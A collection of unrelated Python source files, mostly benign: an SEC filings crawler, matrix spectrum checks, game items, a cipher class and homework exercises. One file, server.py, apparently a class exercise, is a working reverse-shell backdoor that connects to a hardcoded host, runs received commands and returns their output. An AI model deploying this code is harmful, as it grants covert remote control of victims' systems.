712bfa1d9fc2476c22fd135f2332df416e25bdf0 | Python | vparikh10/facial-expression-classifier | /fec/classifier/gl_data.py | UTF-8 | 2,096 | 2.625 | 3 | [] | no_license | import numpy as np
from boto.s3.connection import S3Connection
import os
from filechunkio import FileChunkIO
import math
import pandas as pd
_conn = None
def get_connection():
"""Get the boto connection to Amazon S3
This method assumes the environment variables AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY have been set
:return: s3 connection
"""
global _conn
if _conn is None:
_conn = S3Connection(os.environ['AWS_ACCESS_KEY_ID'],
os.environ['AWS_SECRET_ACCESS_KEY'])
return _conn
def upload_big_file(source_path, bucket):
"""Upload a large file to S3 in chunks
:param source_path: path to the file
:param bucket: s3 bucket string to load to
:return:
"""
source_size = os.stat(source_path).st_size
mp = bucket.initiate_multipart_upload(os.path.basename(source_path))
chunk_size = 52428800
chunk_count = int(math.ceil(source_size / chunk_size))
for i in range(chunk_count + 1):
offset = chunk_size * i
bytes = min(chunk_size, source_size - offset)
with FileChunkIO(source_path, 'r', offset=offset,
bytes=bytes) as fp:
mp.upload_part_from_file(fp, part_num=i + 1)
mp.complete_upload()
def _load_original_data_into_df(file_path):
df = pd.read_csv(file_path)
df = df.rename(columns={'Usage': 'usage', 'Emotion': 'label'})
df['pixels'] = df['pixels'].apply(lambda x:
np.fromstring(x, sep=' ', dtype=int))
return df
if __name__ == '__main__':
fer_data = '/Users/chris/Downloads/fer2013/fer2013.csv'
df = _load_original_data_into_df(fer_data)
this_path = os.path.abspath(__file__)
this_dir, _ = os.path.split(this_path)
df_path = os.path.join(this_dir, 'data', 'django_expression.pkl')
df.to_pickle(df_path)
# df.to_csv('/Users/chris/tmp/fer_processed.csv')
# con = get_connection()
# bucket = con.get_bucket('cmgreen210-emotions')
# upload_big_file('/Users/chris/tmp/fer_processed.csv',
# bucket)
| true |
f8ab8524e8caae4e35e1a6360a1a74cc58c2d5a2 | Python | Lan2008-StudioPro/Python_Singular | /Homework/20210321/t2_climate.py | UTF-8 | 560 | 4.34375 | 4 | [] | no_license | #溫度問題
while True:
a=input('今天攝氏幾度?')
try:
a=int(a)
except:
print('蛤?我問你溫度你回答這什麼鬼東西?')
else:
if a>=40:
print('怎麼可能?這麼熱!')
elif a<=10:
print('天哪!太冷了吧~')
else:
print('真舒適的溫度!')
"""
Topic:輸入溫度,如果溫度>=40度C,顯示: 太熱,
如果溫度<= 10 顯示:太冷, 其他:舒適:
Show:Please input temperature:"
Input1:40
Output:It's too hot.
""" | true |
b0e9b6eecb284ae06b2169c65d1d99aa90802b34 | Python | py2-10-2017/MatthewKim | /Fundamentals/DebuggingLearn.py | UTF-8 | 120 | 3.34375 | 3 | [] | no_license | def multiply(arr,num):
for x in arr:
arr[x] *= num
return x
a = [2,4,10,16]
b = multiply(a,5)
print b
| true |
8444472261faf517ddb82e348afe0690bd4c7b45 | Python | SHawkeye77/game_1 | /items_all/items_research_dome.py | UTF-8 | 6,261 | 3.171875 | 3 | [] | no_license | """
Holds items specifically made in the research dome
"""
from items import Item
from items_all.items_general import *
############################# Achebe Office Items ############################
class WetWipes(Item):
def __init__(self):
super().__init__(name=["Wet Wipes", "Wipes"], can_pick_up=True,
description="A pack of antibacterial wet wipes")
class Drawers(Item):
def __init__(self, description="A set of desk drawers."):
super().__init__(name=["Drawers","Drawer"],can_pick_up=False,
description=description)
def interact(self, player):
print("You open up the drawers. Inside, there are some post-it "
"notes, wet wipes, and a book with the title: \"The Sirens of "
"Titan\".")
class AchebePhd(Item):
def __init__(self):
super().__init__(name=["PhD Certificate", "Certificate"],
description="A framed, mechanical engineering PhD Certificate "
"from University College London", can_pick_up=True)
class Altoids(Food):
def __init__(self):
super().__init__(name=["Tin of Altoids", "Altoids"],
description="A small red tin labeled \"ALTOIDS - CURIOUSLY "
"STRONG MINTS\"", eat_response="Curiously strong! Yum!")
class Poster(Item):
def __init__(self):
super().__init__(name=["Movie Poster", "Poster", "Star Wars Poster"],
can_pick_up=True, description="It's in another language, but it "
"depicts a man on a hill next to a woman and two robots. "
"A dark head looms behind them. The signature "
"says \"Carrie Fisher\".")
class Pen(Item):
def __init__(self, description="A gold and black ballpoint pen. It "
"says \"Montblanc\" on it."):
super().__init__(name=["Pen"], can_pick_up=True, description=\
description)
def use(self, item, player):
if "paper" in [name.lower() for name in item.name]:
w = input("What do you want to write on the paper? ")
print("You write \"" + w + "\" on the paper.")
else:
print("Nothing happens.")
class PostItNotes(Item):
def __init__(self):
super().__init__(name=["Post-It Notes", "Post It Notes", "Post It"],
can_pick_up=True, description="A set of yellow Post-It notes")
############################# Gomez Office Items ############################
class WhiskeyGlass(Item):
def __init__(self):
super().__init__(name=["Whiskey Glass", "Glass"], can_pick_up=True,
description="A small glass for booze")
############################## Zlo Office Items #############################
class ArmChair(Item):
def __init__(self):
super().__init__(name=["Armchair", "Arm Chair", "Comfy Chair",
"Lounge Chair"], can_pick_up=False, description="A red-checkered "
"armchair. Looks pretty comfy!")
def interact(self, player):
print("Ah, just as comfy as it looked!")
class NobelPrize(Item):
def __init__(self):
super().__init__(name=["Award", "Framed Award", "Nobel Prize"],
can_pick_up=True, description="It's a golden coin about the size "
"of two quarters. It's engraved with the portrait of a man "
"and the phrases \"Nat. MDCCCXXXIII Ob. MDCCCXCVI\" and "
"\"ALFR. NOBEL\"")
def interact(self, player):
print("Flipping it over you can see the inscriptions on the back: "
"\"Inventas vitam iuvat excoluisse per artes\", "
"\"REG. ACAD. SCIENT. SUEC.\", \"Erik Lindberg\", and \"O. ZLO "
"MMXXX\"")
class RussianNestingDoll(Item):
def __init__(self):
self.times_opened = 0
self.layers = 5
super().__init__(name=["Russian Nesting Doll", "Nesting Doll", "Doll"],
can_pick_up=True, description="A nesting doll. A faded drawing "
"of a babushka is on it.")
def interact(self, player):
self.times_opened += 1
if (self.times_opened >= self.layers):
print("TODO") # PRESENT PLAYER WITH SOMETHING THAT'S HIDING IN THE CENTER!!!!!!!!!!!!!!!!!!!!
else:
print("You remove a layer from the doll. Another babushka smiles "
"back at you.")
class Map(Item):
def __init__(self, description="A huge map nailed into the wall. "
"Its description reads: \"Czechoslovakia 1970\"."):
super().__init__(name=["Map", "Czechoslovakia Map"],
can_pick_up=False, description=description)
class NewtonsCradle(Item):
def __init__(self):
super().__init__(name=["Newtons Cradle", "Newton's Cradle", "Cradle"], can_pick_up=True,
description="The five-ball classic physics toy")
def interact(self, player):
print("You pull back and let go one of the balls.\nTick - Tick - Tick - Tick..."
"\nThe motion slowly fades out...")
class Scarf(Item):
def __init__(self, description=""):
super().__init__(name=["Scarf", "C.D. Oro Scarf"], can_pick_up=True, description=description)
def interact(self, player):
print("You wave it around your head like a football ultra.")
class EspressoMachine(Item):
def __init__(self):
super().__init__(name=["Espresso Machine", "Espresso"], can_pick_up=False,
description="A black Nespresso espresso machine. Looks like it takes espresso pods, none of which "
"seem to be anywhere nearby. Shame, you could use a shot...")
def interact(self, player):
print("You turn it on and within seconds hot water begins to flow out, tainting the already "
"coffee-stained papers even more.")
class ScatteredPapers(Item):
def __init__(self):
super().__init__(name=["Scattered Papers", "Papers", "Notes", "Scattering of Papers"], can_pick_up=False,
description="An unorganized jumble of research notes and legal paperwork. Most are coffee-stained.")
def interact(self, player):
print("Picking up a sheet you start reading:\n\"AN ANALYSIS OF EXTREME SURVIVAL CAPABILITY ASSETS IN "
"TARDIGRADES\"\nConfusing... You pick up another:\n\"TERRAN ITEM RETRIEVEMENT REQUEST FORM\"\n"
"It's not filled out.") | true |
708333088d6d79c3df015aa2450c2691903a5793 | Python | SMG2S/SMG2S | /scripts/verification.py | UTF-8 | 4,885 | 2.546875 | 3 | [
"MIT"
] | permissive | '''
MIT License
Copyright (c) 2019 Xinzhe WU @ Maison de la Simulation, France
Copyright (c) 2019-2022, Xinzhe Wu @ Simulation and Data Laboratory Quantum
Materials, Forschungszentrum Juelich GmbH.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import scipy.io
from tabulate import tabulate
import matplotlib.pyplot as plt
import numpy as np
from scipy.sparse.linalg import eigs, spsolve
import scipy.sparse as sp
import pandas as pd
import argparse
from matplotlib.patches import Rectangle
import matplotlib.colorbar as cbar
import matplotlib.cm as cm
import matplotlib.collections as collections
from numpy import linalg as LA
#load sparse matrix from MatrixMarket format
#output is in COO format
def loadMatrix(filename):
M = scipy.io.mmread(filename)
return M
#load vector from files following the format of SMG2S
def loadVector(filename):
df=pd.read_csv(filename, comment="%", delim_whitespace=True)
n = df.shape[1]
if n == 3:
return df[df.columns[1]].to_numpy() + 1j * df[df.columns[2]].to_numpy()
elif n == 2:
return df[df.columns[1]].to_numpy()
else:
raise ValueError('Oops! The given vector file is not in good format')
def spy_coo(M, ax, type="pattern"):
if not isinstance(M, sp.coo_matrix):
M = sp.coo_matrix(M)
verts = [((x-0.5, y-0.5), (x-0.5, y+0.5), (x+0.5, y+0.5), (x+0.5,
y-0.5)) for (x,y) in zip(M.col, M.row)]
c = collections.PolyCollection(verts)
if type == "heatmap":
c.set_array(np.absolute(M.data) )
c.set_cmap(cm.Wistia)
ax.add_collection(c)
ax.set_xlim(-1,8)
ax.set_ylim(-1,8)
ax.set_xlim(-0.5, M.shape[1]-0.5)
ax.set_ylim(-0.5, M.shape[0]-0.5)
ax.invert_yaxis()
ax.set_aspect(float(M.shape[0])/float(M.shape[1]))
ax.set_xticks([])
ax.set_yticks([])
ax.set_title("sparsity pattern")
return ax
def plot_spectrum(input, estimate, ax):
x_in = []
y_in = []
x_e = []
y_e = []
for v in input:
x_in.append(v.real)
if np.iscomplex(v):
y_in.append(v.imag)
else:
y_in.append(0.0)
for v in estimate:
x_e.append(v.real)
if np.iscomplex(v):
y_e.append(v.imag)
else:
y_e.append(0.0)
ax.scatter(x_in, y_in, c='black')
ax.scatter(x_e, y_e, marker="+",c='r')
ax.set_ylabel('Imaginary')
ax.set_xlabel('Real')
asp = np.diff(ax2.get_xlim())[0] / np.diff(ax2.get_ylim())[0]
ax.set_aspect(asp)
ax.legend(['Given spectrum', 'Computed eigenvalues'])
ax.set_title("spectrum")
return ax
def compute_spectrum(M):
Mdense = M.toarray()
eigenvalues = LA.eig(Mdense)
return eigenvalues
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='verification of matrices generated matrices to keep given spectra')
parser.add_argument("--matpath", help='path of matrix to be plotted or verified. Matrix should be in MatrixMarket format', default="data/testmatrix_cmplx.mtx")
parser.add_argument("--specpath", help='path of spectrum to be verified which is used to generate the related matrix. Vector should be in SMG2S vector file format', default="data/given_spectrum_cmplx.txt")
parser.add_argument('--verify', help='if only plotting patterns or also verifying the spectrum: default false' ,action='store_true')
value = parser.parse_args()
M=loadMatrix(value.matpath)
fig = plt.figure()
if value.verify:
spec = loadVector(value.specpath)
eigenvalues, _ = compute_spectrum(M)
ax = fig.add_subplot(121)
ax = spy_coo(M, ax)
ax2 = fig.add_subplot(122)
ax2 = plot_spectrum(spec, eigenvalues, ax2)
else:
ax = fig.add_subplot(111)
ax = spy_coo(M, ax)
plt.tight_layout()
plt.show()
| true |
e8885c972bf210344f8d892ba43b2eb4537589c4 | Python | erosethan/Proyecto-Compiladores-1 | /main.py | UTF-8 | 517 | 2.78125 | 3 | [] | no_license | #!/usr/bin/python
import automata, nodo, expreg
entrada = input()
expresionRegular = expreg.marcarConcatenacion(entrada)
print(entrada + ' ===> ' + expresionRegular + '\n')
expresionRegular = expreg.infijaAPosfija(expresionRegular)
inicioAutomata = automata.expregAThompson(expresionRegular)
automata.generarImagen(inicioAutomata, 'AFN')
alfabeto = expreg.obtenerAlfabeto(expresionRegular)
inicioAutomata = automata.thompsonADeterminista(inicioAutomata, alfabeto)
automata.generarImagen(inicioAutomata, 'AFD')
| true |
944be212b7f66b29ba240ab8703291f9cc863192 | Python | zzong2006/coding-problems-study | /pythonProject/leetcode/First Missing Positive.py | UTF-8 | 514 | 3.09375 | 3 | [] | no_license | from typing import List
class Solution:
def firstMissingPositive(self, nums: List[int]) -> int:
if not nums:
return 1
else:
max_val = max(nums)
if max_val <= 0:
return 1
else:
num_set = set(nums)
for i in range(1, max_val):
if i not in num_set:
return i
return max_val + 1
a = Solution()
print(a.firstMissingPositive([3, 4, -1, 1]))
| true |
125d0ffd669a416346ee2edcc48baabf61b8e14f | Python | edu-sense-com/OSE-Python-Course | /SPP/Modul_05/przestawieniowe.py | UTF-8 | 3,626 | 3.953125 | 4 | [
"MIT"
] | permissive | class Skaut_Cipher:
def __init__(self, text: str, direction: str="E") -> None:
"""
direction: E -> for encryption - default
direction: D -> for decryption
"""
self.direction = direction
self.input_text = text.upper() if self.direction == "E" else ""
self.text_encrypted = text.upper() if self.direction == "D" else ""
self.text_decrypted = ""
self.cipher_types = ("GP", "MC")
self.cipher_type = None
self.cipher_ok = False
self.codes_enc_gp = ("G", "D", "R", "P", "L", "K")
self.codes_dec_gp = ("A", "E", "Y", "O", "U", "I")
self.codes_enc_mc = ("M", "T", "L", "C", "D", "K")
self.codes_dec_mc = ("O", "Y", "E", "U", "A", "I")
def change_letters(self, text: str, codes_in: tuple, codes_out: tuple)-> str:
returned_text = ""
for letter in text:
if letter in codes_in:
pos = codes_in.index(letter)
letter = codes_out[pos]
elif letter in codes_out:
pos = codes_out.index(letter)
letter = codes_in[pos]
returned_text += letter
return returned_text
def encrypt(self, cipher: str) -> bool:
self.cipher_type = cipher
self.cipher_ok = self.cipher_type in self.cipher_types
if not self.cipher_ok:
return False
if self.direction != "E":
return False
if self.cipher_type == "GP":
self.text_encrypted = self.change_letters(self.input_text, self.codes_enc_gp, self.codes_dec_gp)
elif self.cipher_type == "MC":
self.text_encrypted = self.change_letters(self.input_text, self.codes_enc_mc, self.codes_dec_mc)
return True
def decrypt(self, cipher: str) -> bool:
self.cipher_type = cipher
self.cipher_ok = self.cipher_type in self.cipher_types
if not self.cipher_ok:
return False
if self.direction != "D":
return False
if self.cipher_type == "GP":
self.text_decrypted = self.change_letters(self.text_encrypted, self.codes_dec_gp, self.codes_enc_gp)
elif self.cipher_type == "MC":
self.text_decrypted = self.change_letters(self.text_encrypted, self.codes_dec_mc, self.codes_enc_mc)
return True
def output(self) -> None:
print(f"Input: {self.input_text}")
print(f"Encrypted: {self.text_encrypted}")
print(f"Decrypted: {self.text_decrypted}")
def return_encrypted(self) -> str:
return self.text_encrypted
def return_decrypted(self) -> str:
return self.text_decrypted
# przykładowe wywołanie:
#
t1 = Skaut_Cipher("G D R P L K - A B C")
t1.encrypt("GP")
t1.output()
t1.decrypt("GP")
t1.output()
print(f"Encrypted text: {t1.return_encrypted()}")
print(f"Decrypted text: {t1.return_decrypted()}")
print("--------------------------------------------")
t2 = Skaut_Cipher("A E Y O U I - G B C", "D")
t2.encrypt("GP")
t2.output()
t2.decrypt("GP")
t2.output()
print(f"Encrypted text: {t2.return_encrypted()}")
print(f"Decrypted text: {t2.return_decrypted()}")
#
# Input: G D R P L K - A B C
# Encrypted: A E Y O U I - G B C
# Decrypted:
# Input: G D R P L K - A B C
# Encrypted: A E Y O U I - G B C
# Decrypted:
# Encrypted text: A E Y O U I - G B C
# Decrypted text:
# --------------------------------------------
# Input:
# Encrypted: A E Y O U I - G B C
# Decrypted:
# Input:
# Encrypted: A E Y O U I - G B C
# Decrypted: G D R P L K - A B C
# Encrypted text: A E Y O U I - G B C
# Decrypted text: G D R P L K - A B C
| true |
1e1a1215e058abea0dfeb04b584c726bb22f195d | Python | jhelphenstine/python-class-exercises | /server.py | UTF-8 | 3,221 | 2.921875 | 3 | [] | no_license | #!/usr/bin/python
# Task: Implement a server to run on an Ubuntu system. It must:
# -- hold a port
# -- receive commands -- in the form of command-line arguments
# -- execute commands -- via os library
# -- return the results -- capture stdout/stderr...
# immediate considerations:
# we'll need sockets
# we'll need pickling or json-ing; i think i'll prefer the pickle to impose
# antiforensics costs
# Must EITHER callback OR listen... I think I'd rather...have it call back.
# That means the client will bind and the server will...well that's an odd
# way of thinking about it; having a server initiate the connection? I'm kindof
# reversing the paradigm there...but once the connection is established, the server
# will service client activity, so we'll just roll with that.
import socket
import os # return values
import ipaddress # Is this necessary?
import re # for passphrase
import sys # for exit
import subprocess # for commands
import pickle # for transfer
import select # for black magic
trinity = "127.0.0.1"
nebuchadnezzar = 31337
def sessionStartup(s):
# We're using a magic string for our initialization; we'll try 3 times and otherwise fail out.
for i in range(1,3):
s.sendall("ATDT18005551234".encode())
signal = s.recv(512)
if re.search("ATA", signal.decode()):
s.sendall("CONNECT".encode())
return True
# If Trinity doesn't pick up, we're screwed
return False
def main():
# What, do you think I'd print a banner for the victim? Pshaw.
# print("Initializing server. Please stand by while your system initiates an unauthorized connection...")
#s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Aren't these the default parameters?
connectionEstablished = False
while True:
try:
#s.connect((trinity, nebuchadnezzar)) # Tee-hee
# This line gets us both socket.socket && socket.connect
s = socket.create_connection((trinity, nebuchadnezzar))
# From a SO question on TCP keepalives
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 3)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
except OSError as e:
# As they say in PowerShell...SilentlyContinue
return -1
if not connectionEstablished:
result = sessionStartup(s)
connectionEstablished = True
if not result:
return -1
while True:
#print("I'm listening") # DEBUG
#s.setblocking(0)
ready = select.select([s], [], [], 300)
while (True):
if ready[0]:
instruction = s.recv(4096)
parsedInstructions = instruction.decode().split()
break
try:
results = subprocess.run(parsedInstructions, capture_output=True)
p = pickle.dumps(results)
except OSError as e:
msg = f"Error encountered: {e}"
p = pickle.dumps(msg)
except IndexError as e:
# This should be taken as a sign the client is done with us
s.close()
return 0
try:
s.sendall(p)
except OSError as e:
#print(f"Error encountered: {e}") # DEBUG
pass
if __name__ == "__main__":
sys.exit(main())
| true |
e43b789c39d64d3991b7118f85f02c82cb605a14 | Python | bpull/FST | /fornick/split.py | UTF-8 | 276 | 2.921875 | 3 | [] | no_license | fp = open("tickers.txt","r")
fp2=open("companies.txt","w")
for line in fp:
newlist = []
for word in line.split():
if word == "reports":
break
else:
newlist.append(word)
fp2.write(newlist.pop(0) + " "+" ".join(newlist)+"\n")
| true |
0590e7cc54b683444f9eff18fddb3ee9732e9382 | Python | MichaelPHartmann/Custom-Analysis-Tools | /main.py | UTF-8 | 799 | 2.65625 | 3 | [] | no_license | """
This is the general working file for accessing the different analysis tools.
All of the tools will be accessed from here to keep clutter down and keep the modules clean.
This also may be used for developing new tools, but they must be moved to their own modules when done.
Export or pickling may happen here for now but eventually a suite of auxiliary functions to handle spreadsheets will be created.
"""
import cairo
from FinMesh.iex import stock
# Cairo uses key stats, balance sheet, and price data
if __name__ == '__main__':
class CustomStockAnalysis:
def __init__(self, methods):
self.m = methods
def print_methods(self):
print(methods)
methods = ['Cairo', 'Berlin', 'Delhi']
ut = CustomStockAnalysis(methods)
ut.print_methods()
| true |
805c7c4fd5e848a6988eab6846b7f9546adc3a78 | Python | techsharif/python_training_2021 | /day1/function.py | UTF-8 | 89 | 3 | 3 | [] | no_license | # def hello ():
# print("hello")
# hello()
def add(a, b):
print(a+b)
add(4, 5) | true |
d6122eb9d0b547020a0d0e0de14335f3af383ee1 | Python | PEDSnet/Data-Quality-Analysis | /Tools/ConflictResolution/resolvers/ba_001.py | UTF-8 | 2,591 | 2.90625 | 3 | [
"BSD-2-Clause"
] | permissive | # function to resolve conflicts from log file
# Inputs: (i) log_issue - an object read the log file (ii) secondary_issue - a similar issue read from the secondary
# report,
# (iii) threshold_l, and threshold_u are the thresholds corresponding to the check type CA-006
# returns a set of objects that would replace the secondary_issue in the secondary report
import re
perct_re = re.compile(r'(\d+(?:\.\d+)?)')
def extract_miss(s):
m = perct_re.match(s)
if not m:
return
p = m.group()
try:
return int(p)
except:
pass
return float(p)
def resolve(log_issue, secondary_issue, threshold_l, threshold_u):
result_issue_list = [] # list of objects to be returned. Issue class
diff_check_code = 'CA-006'
diff_check_type = 'unexpected change in missingness of a field between data cycles'
# extract % of missing data from previous cycle
m_prev = extract_miss(secondary_issue.finding)
# extract % of missing data in current cycle
m_curr = extract_miss(log_issue.finding)
if m_prev is None:
raise ValueError('no missing percentage in secondary issue')
if m_curr is None:
raise ValueError('no missing percentage in log issue')
m_diff = m_curr - m_prev
# if the finding is the same
if m_diff == 0:
return
# prepare a new issue showing difference between missingness
new_issue = log_issue.copy()
new_issue.check_code = diff_check_code
new_issue.check_type = diff_check_type
new_issue.finding = str(m_diff) + '%'
new_issue.status = 'new'
# mutate the old issue in the secondary report with latest findings
mutated_issue = secondary_issue.copy()
mutated_issue.finding = str(m_curr) + '%'
if secondary_issue.status == 'under review':
if m_prev == 100 or m_curr == 100 or m_diff > threshold_u or m_diff < threshold_l: # outside acceptable range
result_issue_list.append(new_issue)
result_issue_list.append(mutated_issue)
if threshold_u > m_diff > threshold_l: # if difference within acceptable limits
result_issue_list.append(mutated_issue)
elif secondary_issue.status == 'persistent':
if m_prev == 100 or m_curr == 100 or m_diff > threshold_u or m_diff < threshold_l: # outside acceptable range
result_issue_list.append(new_issue)
result_issue_list.append(log_issue)
if threshold_u > m_diff > threshold_l: # if different within acceptable limits
result_issue_list.append(mutated_issue)
return result_issue_list
| true |
e575a68d176957788541953feec141022412d060 | Python | Mathakgale/level-0-coding-challenge | /task1.py | UTF-8 | 105 | 3.703125 | 4 | [] | no_license |
x = 0
y = 1
print(f"x = {x}")
print(f"y = {y}")
x = x + 3
y = y + x
print(f"x = {x}")
print(f"y = {y}") | true |
2df354300958188d20f0eabd5d791146f0215c6d | Python | wsgan001/PyFPattern | /Data Set/bug-fixing-5/a9efceb30baa6002b4ea7f551c94f5e65e9d6f41-<_label_path_from_index>-fix.py | UTF-8 | 475 | 2.640625 | 3 | [] | no_license | def _label_path_from_index(self, index):
'\n given image index, find out annotation path\n\n Parameters:\n ----------\n index: int\n index of a specific image\n\n Returns:\n ----------\n full path of annotation file\n '
label_file = os.path.join(self.data_path, 'Annotations', (index + '.xml'))
assert os.path.exists(label_file), 'Path does not exist: {}'.format(label_file)
return label_file | true |
577438bcffa25dd5552a557e661b88db540ae9dc | Python | Aasthaengg/IBMdataset | /Python_codes/p02712/s061370665.py | UTF-8 | 189 | 3.203125 | 3 | [] | no_license | N = int(input())
ans = [0] * (N+1)
for i in range(N+1):
if i % 3 != 0 and i % 5 != 0 and i % 15 != 0:
ans[i] = ans[i-1] + i
else:
ans[i] = ans[i-1]
print(ans[-1])
| true |
897f9ae2bab6ea1212577bfecc210e17a737b78f | Python | JiachenLi/PythonLearning | /emailaddress2.py | UTF-8 | 351 | 3 | 3 | [] | no_license | # !/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module '
__author__ = 'Jiachen Li'
import re
def name_of_email(addr):
s = str(addr)
m = re.match(r'/^\<([a-zA-Z\s]+)\>\s([a-zA-Z][a-zA-Z\d\_\.]*@[a-zA-Z\d]+\.[a-zA-Z]{2,3})$/', s)
if m:
print(m.group(1))
else:
print('can\'t get the name of email') | true |
1811d475dff7f4d0cec5289ec42b86008cad493b | Python | nosleep123/shawn-sascode | /Scraper.py | UTF-8 | 3,856 | 2.734375 | 3 | [] | no_license |
import logging
import os
DEFAULT_DATA_PATH = os.path.abspath(os.path.join(
os.path.dirname('/Users/shuhao/PycharmProjects/Learning/data/SEC'), '..', 'SEC-Edgar-Data'))
# -*- coding:utf-8 -*-
# This script will download all the 10-K, 10-Q and 8-K
# provided that of company symbol and its cik code.
class HoldingInfoNotFoundException(Exception):
pass
import requests
import os
import errno
from bs4 import BeautifulSoup
import pandas as pd
import numpy as np
cik_list = pd.read_csv('/Users/shuhao/Dropbox/Python Project/CIK-2010.csv')
class SecCrawler():
def __init__(self):
self.hello = "Welcome to Sec Cralwer!"
print("Path of the directory where data will be saved: " + DEFAULT_DATA_PATH)
def make_directory(self, cik, filing_type):
# Making the directory to save comapny filings
path = os.path.join(DEFAULT_DATA_PATH, cik, filing_type)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def save_in_directory(self, cik=None, doc_list=None,
doc_name_list=None, filing_type=None):
# Save every text document into its respective folder
for j in range(len(doc_list)):
base_url = doc_list[j]
r = requests.get(base_url)
data = r.text
path = os.path.join(DEFAULT_DATA_PATH, cik,
filing_type, doc_name_list[j])
with open(path, "ab") as f:
f.write(data.encode('ascii', 'ignore'))
def filing_NQ(self,cik, count):
self.make_directory(cik=cik, filing_type='NQ')
# generate the url to crawl
base_url = "https://www.sec.gov/cgi-bin/browse-edgar?action=getcompany&CIK="+str(cik)+"&type=N-Q&owner=exclude&output=xml&count=" +str(count)
print("started N-Q " + str(cik))
r = requests.get(base_url)
data = r.text
print(data)
# get doc list data
doc_list, doc_name = self.create_document_list(data)
# try:
# doc_list, doc_name_list = self.create_document_list(data)
# except:
# erro_cik = erro_cik.append(cik)
# pass
try:
self.save_in_directory(cik=cik, filing_type='NQ', doc_list=doc_list, doc_name_list=doc_name_list)
except Exception as e:
print(str(e))
print("Successfully downloaded all the files")
def create_document_list(self, data):
# parse fetched data using beatifulsoup
soup = BeautifulSoup(data)
# store the link in the list
link_list = list()
# If the link is .htm convert it to .html
for link in soup.find_all('filinghref'):
url = link.string
if link.string.split(".")[len(link.string.split("."))-1] == "htm":
url += "l"
link_list.append(url)
link_list_final = link_list
print ("Number of files to download {0}".format(len(link_list_final)))
print ("Starting download....")
# List of url to the text documents
doc_list = list()
# List of document names
doc_name_list = list()
if len(link_list_final) == 0:
pass
else:
# Get all the doc
# for k in range(len(link_list_final)):
for k in range(1):
required_url = link_list_final[k].replace('-index.html', '')
txtdoc = required_url + ".txt"
docname = txtdoc.split("/")[-1]
doc_list.append(txtdoc)
doc_name_list.append(docname)
return doc_list, doc_name_list
for cik in cik_list['CIK Number']:
data = SecCrawler()
get_report = data.filing_NQ('000'+ str(cik), '1')
| true |
4d68b1e6413d7d15f01902a1f3b32a86b4fde8ae | Python | zhangweisgithub/demo | /python_module/asyncio_module/case2.py | UTF-8 | 2,633 | 3.828125 | 4 | [] | no_license | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
可等待对象
如果一个对象可以在 await 语句中使用,那么它就是 可等待 对象。许多 asyncio API 都被设计为接受可等待对象。
可等待 对象有三种主要类型: 协程, 任务 和 Future.
"""
print("---------------------协程-------------------------")
"""
协程函数: 定义形式为 async def 的函数;
协程对象: 调用 协程函数 所返回的对象。
"""
import asyncio
async def nested():
return 42
async def main():
# Nothing happens if we just call "nested()".
# A coroutine object is created but not awaited,
# so it *won't run at all*.
# nested() # 筑巢; 巢居; 嵌套(信息);
# Let's do it differently now and await it:
print(await nested()) # will print "42".
asyncio.run(main())
print("---------------------任务-------------------------")
"""
任务 被用来设置日程以便 并发 执行协程。
当一个协程通过 asyncio.create_task() 等函数被打包为一个 任务,该协程将自动排入日程准备立即运行:
"""
import asyncio
async def nested():
print("ssss")
return 42
async def main():
# Schedule nested() to run soon concurrently
# with "main()".
task = asyncio.create_task(nested())
# "task" can now be used to cancel "nested()", or
# can simply be awaited to wait until it is complete:
await task
asyncio.run(main())
print("---------------------Future 对象-------------------------")
"""
Future 是一种特殊的 低层级 可等待对象,表示一个异步操作的 最终结果。
当一个 Future 对象 被等待,这意味着协程将保持等待直到该 Future 对象在其他地方操作完毕。
在 asyncio 中需要 Future 对象以便允许通过 async/await 使用基于回调的代码。
通常情况下 没有必要 在应用层级的代码中创建 Future 对象。
Future 对象有时会由库和某些 asyncio API 暴露给用户,用作可等待对象:
"""
print("---------------------sleep-------------------------")
"""
一、获取事件循环
asyncio.get_running_loop()
返回当前 OS 线程中正在运行的事件循环。
如果没有正在运行的事件循环则会引发 RuntimeError。 此函数只能由协程或回调来调用。
"""
import datetime
async def display_date():
loop = asyncio.get_running_loop()
end_time = loop.time() + 5.0
print("end_time:", end_time)
while True:
print(datetime.datetime.now())
if (loop.time() + 1.0) >= end_time:
break
await asyncio.sleep(1)
asyncio.run(display_date())
| true |
cf6fb96b2e2dd3c49fd399938623478f8d986fdd | Python | bolton-nate/ttt_minimax | /main.py | UTF-8 | 4,080 | 3.484375 | 3 | [] | no_license | # This is where your main() function will go.
# The main() function will tie all other functions together.
# You may add other functions here as needed.
from userInput import *
from computerInput import *
from computerRandom import *
from computerMinimax import *
from computerAlphaBeta import *
from Game import *
totalFC = 0
def main():
global totalFC
seriesResults = [0, 0, 0] # ties, count of player1 wins, player2 wins
player1Name = player2Name = None
print("\n\nWelcome To Tic Tac Toe\n")
while player1Name not in ['h', 'H', '1', '2', '3', '4']:
